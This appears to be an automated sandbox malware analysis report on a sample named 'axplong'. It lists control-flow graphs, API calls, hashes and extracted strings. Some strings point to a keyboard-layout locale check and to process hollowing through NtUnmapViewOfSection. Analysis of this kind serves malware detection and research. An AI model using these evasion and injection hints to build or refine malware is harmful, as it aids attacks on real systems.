                                                                                                                                                                            control_flow_graph 2097 c6d312-c6d315 2098 c6d324-c6d327 call c88aa4 2097->2098 2100 c6d32c-c6d32f 2098->2100 2101 c6d317-c6d322 call c88cf9 2100->2101 2102 c6d331-c6d332 2100->2102 2101->2098 2105 c6d333-c6d337 2101->2105 2106 c52440-c52490 call c52380 call c83a31 call c837dc 2105->2106 2107 c6d33d-c6dcde call c6ab41 call c83a31 call c97bc5 2105->2107 2121 c6dce4-c6dd49 2107->2121 2122 c6de8d-c6de90 2107->2122 2123 c6dd8e 2121->2123 2124 c6dd4b-c6dd58 2121->2124 2127 c6dd94-c6dda0 2123->2127 2125 c6dd7d-c6dd8c 2124->2125 2126 c6dd5a-c6dd5f 2124->2126 2125->2127 2126->2125 2128 c6dd61-c6dd66 2126->2128 2129 c6dda2-c6ddc4 2127->2129 2130 c6ddd1 2127->2130 2128->2125 2131 c6dd68-c6dd6d 2128->2131 2132 c6ddc6-c6ddcf 2129->2132 2133 c6ddd4-c6ddf1 2129->2133 2130->2133 2131->2125 2134 c6dd6f-c6dd74 2131->2134 2132->2133 2135 c6ddf7-c6de0f 2133->2135 2136 c6de8a-c6de8c 2133->2136 2134->2125 2137 c6dd76-c6dd7b 2134->2137 2135->2136 2138 c6de11-c6de17 2135->2138 2136->2122 2137->2123 2137->2125 2138->2136 2139 c6de19-c6de31 2138->2139 2139->2136 2140 c6de33-c6de4d 2139->2140 2140->2136 2141 c6de4f-c6de6a 2140->2141 2141->2136 2142 c6de6c-c6de7b 2141->2142 2142->2136 2143 c6de7d-c6de84 2142->2143 2143->2136
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00C5247E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2659868963-0
                                                                                                                                                                            • Opcode ID: e506f06b12a1cf319fdee8f24a53a367d24a6d96b3b2ef48617496736ab4dc71
                                                                                                                                                                            • Instruction ID: 3c63a5eaaf603e26fe17e7e726b9e314d8e9790be926aba6b916b8b1a3835e68
                                                                                                                                                                            • Opcode Fuzzy Hash: e506f06b12a1cf319fdee8f24a53a367d24a6d96b3b2ef48617496736ab4dc71
                                                                                                                                                                            • Instruction Fuzzy Hash: 8451BEB1E006058FDB25DF59E8C17AEB7F4FB48310F24866AD816EB290D7759A40DFA0

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 c63550-c63589 1 c64160-c64166 0->1 2 c6358f-c635df call c67f30 0->2 3 c64194-c641ac 1->3 4 c64168-c64174 1->4 17 c64237 call c68070 2->17 18 c635e5-c6362b call c67f30 2->18 8 c641ae-c641ba 3->8 9 c641da-c641f2 3->9 6 c64176-c64184 4->6 7 c6418a-c64191 call c6d593 4->7 6->7 13 c64273 call c86b9a 6->13 7->3 15 c641d0-c641d7 call c6d593 8->15 16 c641bc-c641ca 8->16 11 c641f4-c64200 9->11 12 c6421c-c64236 call c6cf21 9->12 19 c64212-c64219 call c6d593 11->19 20 c64202-c64210 11->20 15->9 16->13 16->15 29 c6423c call c68070 17->29 18->17 32 c63631-c6366f call c67f30 18->32 19->12 20->13 20->19 36 c64241 call c86b9a 29->36 32->17 39 c63675-c636c0 call c67f30 call c67870 call c55b20 32->39 40 c64246 call c86b9a 36->40 54 c636c4-c636f9 call c68ad0 39->54 55 c636c2 39->55 43 c6424b call c68070 40->43 47 c64250 call c86b9a 43->47 51 c64255 call c86b9a 47->51 56 c6425a-c6425f call c6c0c9 51->56 54->29 61 c636ff-c6372e call c67f30 54->61 55->54 60 c64264 call c86b9a 56->60 65 c64269-c6426e call c6c109 60->65 66 c63730-c6373f 61->66 67 c6375f-c63784 call c59820 61->67 65->13 69 c63755-c6375c call c6d593 66->69 70 c63741-c6374f 66->70 75 c6378a-c637f2 call c67870 call c55b20 call c67f30 67->75 76 c63c68-c63c6e 67->76 69->67 70->36 70->69 109 c637f6-c6382d call c693a0 75->109 110 c637f4 75->110 77 c63c70-c63c7c 76->77 78 c63c9c-c63ca2 76->78 80 c63c92-c63c99 call c6d593 77->80 81 c63c7e-c63c8c 77->81 83 c63ca4-c63cb0 78->83 84 c63cd0-c63cd6 78->84 80->78 81->60 81->80 85 c63cc6-c63ccd call c6d593 83->85 86 c63cb2-c63cc0 83->86 87 c63d04-c63d1c 84->87 88 c63cd8-c63ce4 84->88 85->84 86->60 86->85 94 c63d1e-c63d2d 87->94 95 c63d4d-c63d53 87->95 92 c63ce6-c63cf4 88->92 93 c63cfa-c63d01 call c6d593 88->93 92->60 92->93 93->87 101 c63d43-c63d4a call c6d593 94->101 102 c63d2f-c63d3d 94->102 95->1 98 c63d59-c63d65 95->98 104 c64156-c6415d call c6d593 98->104 105 c63d6b-c63d79 98->105 101->95 102->60 102->101 104->1 105->60 112 c63d7f 105->112 117 c6382f-c6383a 109->117 118 c6385a-c63867 109->118 110->109 112->104 119 c63850-c63857 call c6d593 117->119 120 c6383c-c6384a 117->120 121 c63898-c6389f 118->121 122 c63869-c63878 118->122 119->118 120->40 120->119 123 c638a5-c638c7 121->123 124 c63a63-c63a93 call c87443 call c88979 121->124 126 c6388e-c63895 call c6d593 122->126 127 c6387a-c63888 122->127 123->43 128 c638cd-c638ff call c67f30 call c5aca0 123->128 124->56 140 c63a99-c63a9c 124->140 126->121 127->40 127->126 141 c63957-c63960 128->141 142 c63901-c63907 128->142 140->65 143 c63aa2-c63aa5 140->143 146 c63962-c63971 141->146 147 c63991-c639d1 call c67870 * 2 call c54960 141->147 144 c63935-c63954 142->144 145 c63909-c63915 142->145 143->76 148 c63aab 143->148 144->141 150 c63917-c63925 145->150 151 c6392b-c63932 call c6d593 145->151 152 c63987-c6398e call c6d593 146->152 153 c63973-c63981 146->153 188 c639d3-c639d9 147->188 189 c63a29-c63a32 147->189 154 c63d84-c63e4d call c67f30 call c67870 call c55b20 call c67870 * 5 148->154 155 c63ab2-c63b77 call c67f30 call c67870 call c55b20 call c67870 * 5 148->155 156 c63e52-c63eb4 call c67870 * 4 call c62e20 148->156 157 c63b9d-c63c5d call c67f30 call c67870 call c55b20 call c67870 * 5 call c61dd0 148->157 150->47 150->151 151->144 152->147 153->47 153->152 238 c63b7b-c63b8d call c67870 call c607f0 154->238 155->238 156->76 241 c63c62 157->241 195 c63a07-c63a26 188->195 196 c639db-c639e7 188->196 189->124 193 c63a34-c63a43 189->193 200 c63a45-c63a53 193->200 201 c63a59-c63a60 call c6d593 193->201 195->189 203 c639fd-c63a04 call c6d593 196->203 204 c639e9-c639f7 196->204 200->51 200->201 201->124 203->195 204->51 204->203 244 c63b92-c63b98 238->244 241->76 244->76
                                                                                                                                                                            APIs
                                                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00C6425F
                                                                                                                                                                              • Part of subcall function 00C67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C6795C
                                                                                                                                                                              • Part of subcall function 00C67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C67968
                                                                                                                                                                              • Part of subcall function 00C67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C67971
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                            • String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
                                                                                                                                                                            • API String ID: 4234742559-3875209911
                                                                                                                                                                            • Opcode ID: a302671d77ec2df1091467867da4f91809fd34c2c3cafea3be103afbaae31be0
                                                                                                                                                                            • Instruction ID: 0df85c5f75713af9b68562d72a100d73b7be9580afe7ebbac3cc916835a01472
                                                                                                                                                                            • Opcode Fuzzy Hash: a302671d77ec2df1091467867da4f91809fd34c2c3cafea3be103afbaae31be0
                                                                                                                                                                            • Instruction Fuzzy Hash: 64522770A10248DBDF28EF78CC8AB9D7B75AF46304F50469CE405A72C2D7759B84DBA2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00C67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C6795C
                                                                                                                                                                              • Part of subcall function 00C67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C67968
                                                                                                                                                                              • Part of subcall function 00C67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C67971
                                                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00C64EA2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                            • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                                                                                                                            • API String ID: 4234742559-1662704651
                                                                                                                                                                            • Opcode ID: 433302ee9de2ccace66a3cd470678c240ec2fce5204917e74d9d1d8cef0bb77e
                                                                                                                                                                            • Instruction ID: 7fe4c2e02165bf505c30fa8cbe2a15fb970a39a9f8e780ed4fabb1d85be3ec6e
                                                                                                                                                                            • Opcode Fuzzy Hash: 433302ee9de2ccace66a3cd470678c240ec2fce5204917e74d9d1d8cef0bb77e
                                                                                                                                                                            • Instruction Fuzzy Hash: D6231471E001589BEB29DB28CDC979DBB769B85308F5482D8E009AB2C2DB359FC5CF51

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1006 c558f0-c5594d 1007 c55950-c5596b call c67df0 1006->1007 1009 c55971-c559a8 call c67870 1007->1009 1010 c55aed-c55af3 1007->1010 1016 c559ae-c559c0 1009->1016 1017 c55b19-c55b91 call c68070 call c55850 call c558f0 call c54af0 1009->1017 1012 c55af5 1010->1012 1013 c55af7-c55b18 call c6cf21 1010->1013 1012->1013 1019 c559c4-c559df call c67f30 call c55640 1016->1019 1020 c559c2 1016->1020 1049 c55b93-c55b9f 1017->1049 1050 c55bbf-c55bd7 1017->1050 1031 c559e1-c559e9 1019->1031 1032 c55a0e-c55a15 1019->1032 1020->1019 1036 c559ed-c559f1 1031->1036 1037 c559eb 1031->1037 1034 c55a17-c55a19 1032->1034 1035 c55a1c-c55a2c 1032->1035 1034->1035 1039 c55a5f 1035->1039 1040 c55a2e-c55a37 1035->1040 1036->1032 1041 c559f3-c559f8 1036->1041 1037->1036 1046 c55a62-c55a6b 1039->1046 1045 c55a40-c55a58 1040->1045 1042 c559fc-c55a02 1041->1042 1043 c559fa 1041->1043 1047 c55a04 1042->1047 1048 c55a06-c55a09 1042->1048 1043->1042 1045->1046 1051 c55a5a-c55a5d 1045->1051 1052 c55a6d 1046->1052 1053 c55a6f-c55a73 1046->1053 1047->1048 1054 c55add-c55ae7 1048->1054 1055 c55bb5-c55bbc call c6d593 1049->1055 1056 c55ba1-c55baf 1049->1056 1057 c55c01-c55c07 1050->1057 1058 c55bd9-c55be5 1050->1058 1051->1039 1051->1045 1052->1053 1059 c55a75-c55a7b 1053->1059 1060 c55aa3 1053->1060 1054->1009 1054->1010 1055->1050 1056->1055 1064 c55c4d call c86b9a 1056->1064 1061 c55c31-c55c4c call c6cf21 1057->1061 1062 c55c09-c55c15 1057->1062 1066 c55bf7-c55bfe call c6d593 1058->1066 1067 c55be7-c55bf5 1058->1067 1068 c55a80-c55a9c 1059->1068 1063 c55aa6-c55ad7 1060->1063 1070 c55c27-c55c2e call c6d593 1062->1070 1071 c55c17-c55c25 1062->1071 1072 c55ad9 1063->1072 1073 c55adb 1063->1073 1078 c55c52-c55c57 call c86b9a 1064->1078 1066->1057 1067->1064 1067->1066 1068->1063 1069 c55a9e-c55aa1 1068->1069 1069->1060 1069->1068 1070->1061 1071->1070 1071->1078 1072->1073 1073->1054
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $($00000419$00000422$00000423$0000043f$GVQsgL==$IVKsgL==$Keyboard Layout\Preload$NtUnmapViewOfSection$RBPleCSm$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                                                                                            • API String ID: 0-2634686781
                                                                                                                                                                            • Opcode ID: 467e76c54acd10e7d7bae2b5939d323731ef2d7e4d7651771d9b493f2dcb632e
                                                                                                                                                                            • Instruction ID: 24aa451334ab6ed2aa90d42b601b3cf79cccef9ea0417864334e102f89badf2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 467e76c54acd10e7d7bae2b5939d323731ef2d7e4d7651771d9b493f2dcb632e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FB14A74E00684CFDB14DF68D8A0BADBBB2FF49300F10465DE8119B382D775AA89CB94

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1334 c5bd60-c5bdac 1335 c5c1a1-c5c1c6 call c67f30 1334->1335 1336 c5bdb2-c5bdb6 1334->1336 1341 c5c1f4-c5c20c 1335->1341 1342 c5c1c8-c5c1d4 1335->1342 1336->1335 1337 c5bdbc-c5bdc0 1336->1337 1337->1335 1339 c5bdc6-c5be4f call c67870 call c55b20 1337->1339 1372 c5be51 1339->1372 1373 c5be53-c5be6f 1339->1373 1343 c5c212-c5c21e 1341->1343 1344 c5c158-c5c170 1341->1344 1346 c5c1d6-c5c1e4 1342->1346 1347 c5c1ea-c5c1f1 call c6d593 1342->1347 1348 c5c224-c5c232 1343->1348 1349 c5c14e-c5c155 call c6d593 1343->1349 1350 c5c176-c5c182 1344->1350 1351 c5c243-c5c25f call c6cf21 1344->1351 1346->1347 1352 c5c26f-c5c274 call c86b9a 1346->1352 1347->1341 1348->1352 1356 c5c234 1348->1356 1349->1344 1357 c5c239-c5c240 call c6d593 1350->1357 1358 c5c188-c5c196 1350->1358 1356->1349 1357->1351 1358->1352 1364 c5c19c 1358->1364 1364->1357 1372->1373 1375 c5be71-c5be80 1373->1375 1376 c5bea0-c5bf0f call c67870 call c55b20 call c67870 call c55b20 1373->1376 1377 c5be96-c5be9d call c6d593 1375->1377 1378 c5be82-c5be90 1375->1378 1389 c5bf11 1376->1389 1390 c5bf13-c5bf29 1376->1390 1377->1376 1378->1377 1389->1390 1392 c5bf2b-c5bf3a 1390->1392 1393 c5bf5a-c5bf82 1390->1393 1394 c5bf50-c5bf57 call c6d593 1392->1394 1395 c5bf3c-c5bf4a 1392->1395 1396 c5bf84-c5bf93 1393->1396 1397 c5bfb3-c5bfda 1393->1397 1394->1393 1395->1394 1398 c5bf95-c5bfa3 1396->1398 1399 c5bfa9-c5bfb0 call c6d593 1396->1399 1406 c5bfe0-c5c07a call c84180 1397->1406 1398->1399 1399->1397 1413 c5c085-c5c090 1406->1413 1413->1406
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                                                                                                                            • API String ID: 0-332458646
                                                                                                                                                                            • Opcode ID: 33378478f6ea558a0aeed78d9e0d0b206b605914880233572f704b59165cdf6e
                                                                                                                                                                            • Instruction ID: a22820af3368e09ca92178560717479726fdb6b27547ae5370430077a095ede0
                                                                                                                                                                            • Opcode Fuzzy Hash: 33378478f6ea558a0aeed78d9e0d0b206b605914880233572f704b59165cdf6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB1E5B1A002189FEB24CF28CC85B9EBB65EF45305F5041A9F909972C2DB759EC4CF99

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1415 c55df0-c55eee 1421 c55ef0-c55efc 1415->1421 1422 c55f18-c55f25 call c6cf21 1415->1422 1423 c55f0e-c55f15 call c6d593 1421->1423 1424 c55efe-c55f0c 1421->1424 1423->1422 1424->1423 1426 c55f26-c560ad call c86b9a call c6e080 call c67f30 * 5 1424->1426 1445 c560b3-c56143 call c84020 1426->1445 1446 c56478-c56481 1426->1446 1471 c56466-c56472 1445->1471 1472 c56149-c5614d 1445->1472 1447 c56483-c5648e 1446->1447 1448 c564ae-c564b7 1446->1448 1453 c564a4-c564ab call c6d593 1447->1453 1454 c56490-c5649e 1447->1454 1450 c564e4-c564ed 1448->1450 1451 c564b9-c564c4 1448->1451 1457 c564ef-c564fa 1450->1457 1458 c5651a-c56523 1450->1458 1455 c564c6-c564d4 1451->1455 1456 c564da-c564e1 call c6d593 1451->1456 1453->1448 1454->1453 1459 c5659e-c565a3 call c86b9a 1454->1459 1455->1456 1455->1459 1456->1450 1463 c56510-c56517 call c6d593 1457->1463 1464 c564fc-c5650a 1457->1464 1466 c56525-c56530 1458->1466 1467 c5654c-c56555 1458->1467 1463->1458 1464->1459 1464->1463 1476 c56542-c56549 call c6d593 1466->1476 1477 c56532-c56540 1466->1477 1469 c56557-c56566 1467->1469 1470 c56582-c5659d call c6cf21 1467->1470 1478 c56578-c5657f call c6d593 1469->1478 1479 c56568-c56576 1469->1479 1471->1446 1480 c56460 1472->1480 1481 c56153-c56187 1472->1481 1476->1467 1477->1459 1477->1476 1478->1470 1479->1459 1479->1478 1480->1471 1491 c5644d-c56454 1481->1491 1492 c5618d-c561ad 1481->1492 1491->1481 1493 c5645a 1491->1493 1494 c561b0-c561b9 1492->1494 1493->1480 1494->1494 1495 c561bb-c5624d call c67c50 call c68090 call c67870 * 2 call c55c60 1494->1495 1495->1491
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                            • API String ID: 0-3963862150
                                                                                                                                                                            • Opcode ID: 149c7728b3c37574e47ae5a59cc7d213a66e2ce171dc6d882ac51a66025509f2
